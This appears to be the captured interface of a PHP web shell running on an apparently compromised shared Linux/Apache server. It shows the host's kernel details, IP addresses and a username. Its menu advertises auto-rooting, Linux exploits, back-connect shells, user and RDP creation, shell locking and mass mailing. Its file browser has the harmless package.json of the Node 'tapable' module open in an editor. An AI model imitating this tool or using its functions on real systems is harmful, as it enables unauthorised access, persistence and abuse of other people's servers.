Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
tapable /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
package.json
766
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "tapable", "version": "1.0.0", "author": "Tobias Koppers @sokra", "description": "Just a little module for plugins.", "license": "MIT", "repository": { "type": "git", "url": "http://github.com/webpack/tapable.git" }, "devDependencies": { "babel-core": "^6.26.0", "babel-jest": "^21.0.2", "babel-polyfill": "^6.26.0", "babel-preset-env": "^1.6.0", "codecov": "^2.3.0", "jest": "^21.0.4" }, "engines": { "node": ">=6" }, "files": [ "lib" ], "homepage": "https://github.com/webpack/tapable", "main": "lib/index.js", "scripts": { "test": "jest", "travis": "jest --coverage && codecov" }, "jest": { "transform": { "__tests__[\\\\/].+\\.js$": "babel-jest" } } }
Close